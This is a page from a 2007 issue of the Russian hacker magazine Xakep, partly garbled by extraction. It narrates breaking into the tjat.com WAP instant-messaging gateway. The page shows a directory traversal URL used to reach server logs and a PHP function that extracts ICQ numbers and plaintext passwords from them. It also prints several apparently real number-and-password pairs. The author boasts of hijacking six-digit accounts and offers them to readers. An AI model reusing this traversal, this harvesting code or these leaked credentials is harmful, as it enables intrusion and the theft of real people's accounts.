Ãœðù - Xakep Online
Ãœðù - Xakep Online
Ãœðù - Xakep Online
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
взлом<br />
Msn-аккаунты<br />
IM-пейджер в WAP<br />
Затем я отыскал директорию с логами:<br />
http://wap.tjat.com/?lang=ru<br />
/../../../../../../../../../../<br />
../../..<br />
/usr/local/apache/logs/temp.<br />
tjat.comaccess_log&&dira=./../../logs<br />
Мое внимание сразу привлек лог total_tjat.<br />
com-access_log, весил он немало — аж<br />
1981336,5 Кб. Обычными средствами php<br />
открыть его было невозможно. Не особо<br />
расстроившись, я немного погуглил на<br />
эту тему и написал небольшой скриптик,<br />
позволяющий открывать такие большие<br />
файлы:<br />
<br />
Загрузив часть лога, я изучил его структуру и<br />
изменил свою функцию так, чтобы она выводила<br />
только асечные номера и пароли:<br />
function bigfile($filename)<br />
{<br />
$fd = fopen($filename, "r");<br />
while (!feof($fd)) {<br />
$buffer = fgets($fd, 20*4096);<br />
preg_match_all('/<br />
icq_uin=([0-9]{5,9})&icq_<br />
pwd=(.*)(&|HTTP)/i',<br />
$buffer,$matches);<br />
$matches[0] = array_<br />
unique($matches[0]);<br />
!empty($matches[0][0]) ? print<br />
$matches[0][0]."\n" : '';<br />
fclose($fd);<br />
}<br />
}<br />
В результате браузер выдал мне кучу неупорядоченной<br />
информации, содержащую пароли и<br />
номера. Теперь их надо было как-то очистить от<br />
лишнего мусора и систематизировать. Для этого<br />
я снова применил свои кодерские способности и<br />
написал простенький парсер, который выводил<br />
мне упорядоченный список без повторов в формате<br />
uin;password и общее количество всех номеров:<br />
<br />
Затем я запустил свое творение у себя на<br />
локалхосте, вбил туда хаотичный список с tjat.com и<br />
выполнил, получив в итоге список уинов и паролей<br />
(привожу небольшой кусочек тут, да простят<br />
меня владельцы этих номеров):<br />
204685805;tatyshka<br />
204755617;120681<br />
204767779;gn1260<br />
204845253;maximko<br />
204876333;12345678<br />
204968096;1q2a3z<br />
205032105;049989350<br />
205191731;asdfgh<br />
Приведенные здесь уины я не тронул, впрочем,<br />
как и остальные семи-, восьми- и девятизнаки,<br />
а на всех полученных шестизнаках с помощью<br />
товарища DarkFull'а были изменены пароли.<br />
Так что, если будет нужен короткий номерок,<br />
обращайся :).<br />
Развязка<br />
Итак, tjat.com предоставляет доступ не только к<br />
ICQ, но и к msn, причем в логах msn’овских аккаунтов<br />
раза в 3 больше, чем асечных. Я подумал, а почему<br />
бы не составить список тех же hotmail’овских<br />
/ 088<br />
xàêåð 05 /101/ 07